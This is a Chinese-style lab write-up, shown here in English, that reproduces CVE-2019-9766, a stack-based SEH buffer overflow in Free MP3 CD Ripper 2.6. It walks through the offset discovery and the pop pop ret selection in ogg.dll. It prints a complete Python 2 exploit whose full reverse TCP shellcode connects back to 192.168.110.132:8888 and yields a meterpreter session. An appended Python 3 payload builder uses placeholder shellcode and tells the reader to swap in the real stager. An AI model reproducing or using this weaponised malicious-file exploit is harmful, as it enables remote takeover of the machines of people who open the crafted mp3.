CVE-2019-9766 Free MP3 CD Ripper 2.6: stack-based buffer overflow, reproduction and exploitation

Vulnerability details: https://nvd.nist.gov/vuln/detail/CVE-2019-9766

Lab environment
Attacker machine: Kali Linux (2019 release)
Target machine: CN_Windows7_x86_sp1
Software version: Free MP3 CD Ripper 2.6
Debugging tools: WinDbg x86 v6.12.2.633, python-2.7.15, Immunity Debugger 1.85

Procedure

1. Confirming the overflow

(1) Generate a crafted .mp3 file with Python: here 10000 'A' characters are written out as a .mp3 file, code as shown in the figure.
(2) Run FmcrExploit.py to generate TestFMCR.mp3, as shown in the figure.
(3) Copy TestFMCR.mp3 to the target machine, start Free MP3 CD Ripper, then start WinDbg and attach it to fcrip.exe (the Free MP3 CD Ripper process).
(4)-(5) Convert TestFMCR.mp3 in Free MP3 CD Ripper: WinDbg reports that the program raised an exception, as shown in the figure.
(6) Run !exchain to inspect the SEH chain: the SEH record has been overwritten by the 10000 'A's (0x41414141), as shown in the figure.

2. Determining the offset and building the payload

(1)(2) Replace the "A"*10000 in FmcrExploit.py with a 10000-byte non-repeating pattern and repeat step 1.2 to generate TestFMCR.mp3.
(3) Repeat steps 1.3 to 1.6: the pointer to the next SEH record is now overwritten with 0x46326846, as shown in the figure.
(4) Look 0x46326846 up in the pattern to get the offset: the pointer to the next SEH record starts 4116 bytes into the buffer.
(5) Verify the offset from 2.4: set buffer in FmcrExploit.py to "A"*4116, repeat step 1.2 to generate the .mp3 file and copy it to the target.
(6) On the target, start Immunity Debugger 1.85, attach it to Free MP3 CD Ripper and convert the file: exactly 4116 'A's land in front of the pointer to the next SEH record, which confirms the offset.
(7) The pointer to the next SEH record (nSEH) normally holds the address of the next SEH record in the chain. The overwrite places a short jump followed by NOP padding in nSEH, a 4-byte handler address in the SE handler slot, then a NOP sled and the shellcode. When the exception fires, the overwritten handler address is called; a pop pop ret there returns into nSEH, whose short jump skips the handler slot and lands in the NOP sled.
(8) SEH and nSEH therefore have to be used together to complete the attack.
(9) Find a pop pop ret sequence; from the candidates pick one inside a module shipped with the software itself, here ogg.dll in the Free MP3 CD Ripper install directory. The address is 0x66e42084, written in the payload as "\x84\x20\xe4\x66".
(10) Note: the CPU stores an address in memory with the bytes in the reverse order from how it is written (little-endian), so 0x66e42084 has to be written as "\x84\x20\xe4\x66".
(11) Generate the shellcode; here a reverse TCP shellcode is used (the buf += lines below are in msfvenom's -f python output format), as shown in the figure.
(12) From 2.11 the shellcode is 341 bytes. The overflowed buffer, however, sits close to the top of the stack, so only a little space remains after the SE handler slot (Immunity Debugger stack view, shortened):

    040AFEBC  040AFEE8  Pointer to next SEH record
    040AFEC0  004955CB  SE handler
    040AFEC4  040AFED4
    ...
    040AFEE4  00492C1A  RETURN to fcrip.00492C1A
    040AFEE8  040AFF24  Pointer to next SEH record
    040AFEEC  00492092  SE handler
    ...
    040AFFC4  FFFFFFFF  End of SEH chain
    040AFFC8  7769E0ED  SE handler
    ...
    040AFFF4  004047F4  fcrip.004047F4
    040AFFF8  01483044
    040AFFFC  00000000

0x040AFFFC - 0x040AFEC4 = 0x138 = 312 decimal; counting the last dword as well, the space after the SE handler slot is 312 + 4 = 316 bytes, which cannot hold a 341-byte shellcode.
(13) Other techniques would work here but are more involved, so instead try to shrink the shellcode. Regenerating it gives 283 bytes, which fits in the remaining space, as shown in the figure.
(14) Putting the above together, FmcrExploit.py becomes (Python 2, matching the lab's python-2.7.15):

    # Stack-based buffer overflow in Free MP3 CD Ripper 2.6
    buffer = "A"*4116                    # filler up to the pointer to next SEH record (step 2.4)
    NSEH   = "\xeb\x06\x90\x90"          # jmp short +6: skips the SE handler slot into the NOPs
    SEH    = "\x84\x20\xe4\x66"          # pop pop ret in ogg.dll, 0x66e42084 little-endian (step 2.9/2.10)
    nops   = "\x90"*5
    # reverse TCP stager, 283 bytes; connects back to 192.168.110.132:8888 (bytes c0 a8 6e 84 / 22 b8)
    buf =  ""
    buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
    buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
    buf += "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
    buf += "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
    buf += "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
    buf += "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
    buf += "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
    buf += "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
    buf += "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
    buf += "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
    buf += "\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
    buf += "\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x6e\x84"
    buf += "\x68\x02\x00\x22\xb8\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
    buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
    buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
    buf += "\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8"
    buf += "\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00"
    buf += "\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
    buf += "\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3"
    pad = "B"*(316-len(nops)-len(buf))   # fill the 316 bytes after the SE handler (step 2.12)
    payload = buffer+NSEH+SEH+nops+buf+pad
    try:
        f = open("TestFMCR.mp3", "wb")   # binary mode, so no newline translation of \x0a
        print "[+] Creating %s bytes mp3 File..." % len(payload)
        f.write(payload)
        f.close()
        print "[+] mp3 File created successfully!"
    except:
        print "File cannot be created!"

3. Exploitation test

(1) On Kali, start a listener in msfconsole and wait for the target to connect back, as shown in the figure.
(2) Copy the .mp3 file to the target, open Free MP3 CD Ripper and convert it: a meterpreter session is established, as shown in the figure.
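The same construction as an added, stand-alone example in Python 3 (this is not code from the original write-up): it regenerates a Metasploit-style cyclic pattern to recover the 4116-byte offset from the nSEH value 0x46326846 seen in step 2.3, packs the pop pop ret address little-endian as in step 2.10, and applies the 316-byte space check from step 2.12 before assembling the filler | nSEH | SE handler | NOPs | shellcode | pad layout. The layout constants are the article's; the assumption that the write-up's pattern follows pattern_create.rb's Aa0Aa1... scheme is mine (the offset it yields agrees with the article's 4116), and the shellcode is a constructed placeholder of INT3 bytes rather than the real stager.

```python
# Added example (Python 3), not from the original write-up: offset lookup,
# little-endian packing and SEH payload layout for the Free MP3 CD Ripper 2.6
# overflow, with the 316-byte space check from step 2.12.
import struct
import string

NSEH_OFFSET = 4116          # bytes of filler before the pointer to next SEH record (step 2.4)
SPACE_AFTER_SEH = 316       # bytes between the SE handler slot and the top of the stack (step 2.12)
POP_POP_RET = 0x66E42084    # pop pop ret in ogg.dll (step 2.9)
NSEH = b"\xeb\x06\x90\x90"  # jmp short +6 over the SE handler slot, then two NOPs
NOP_SLED = 5                # NOPs in front of the shellcode, as in the article


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...). No 4-byte window repeats
    within the first 20280 bytes, so a dword read from an overwritten slot
    pins down exactly one offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(dword, length=10000):
    """Offset of a dword seen in the debugger (e.g. the overwritten nSEH) inside
    the pattern, or -1. The debugger shows an integer; memory holds it
    little-endian, so it is repacked before searching."""
    return pattern_create(length).find(struct.pack("<I", dword))


def p32(addr):
    """Pack an address the way x86 stores it: least significant byte first."""
    return struct.pack("<I", addr)


def shellcode_fits(shellcode, nop_sled=NOP_SLED):
    """The limit from step 2.12: the 341-byte stager does not fit, 283 bytes do."""
    return nop_sled + len(shellcode) <= SPACE_AFTER_SEH


def build_payload(shellcode, nop_sled=NOP_SLED):
    """filler | nSEH (short jmp) | SE handler (pop pop ret) | NOPs | shellcode | pad."""
    if not shellcode_fits(shellcode, nop_sled):
        raise ValueError("shellcode of %d bytes exceeds the %d bytes after the SE handler"
                         % (len(shellcode), SPACE_AFTER_SEH - nop_sled))
    pad = b"B" * (SPACE_AFTER_SEH - nop_sled - len(shellcode))
    return (b"A" * NSEH_OFFSET + NSEH + p32(POP_POP_RET)
            + b"\x90" * nop_sled + shellcode + pad)


if __name__ == "__main__":
    # nSEH value observed in step 2.3 -> the article's offset 4116
    print("offset of 0x46326846:", pattern_offset(0x46326846))
    # 0x66e42084 -> b'\x84\x20\xe4\x66', the byte string used in the article
    print("pop pop ret packed:", p32(POP_POP_RET))
    # Constructed placeholder: 283 INT3 bytes stand in for the real stager.
    placeholder = b"\xcc" * 283
    payload = build_payload(placeholder)
    with open("TestFMCR.mp3", "wb") as f:   # binary mode: no newline translation
        f.write(payload)
    print("[+] wrote %d-byte TestFMCR.mp3" % len(payload))
```

Running the file writes a TestFMCR.mp3 with the placeholder shellcode; substitute the 283-byte stager from step 2.13 for the real test. The placeholder still exercises the layout: if the handler address and short jump are right, the debugger stops on the first INT3 after the NOP sled.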
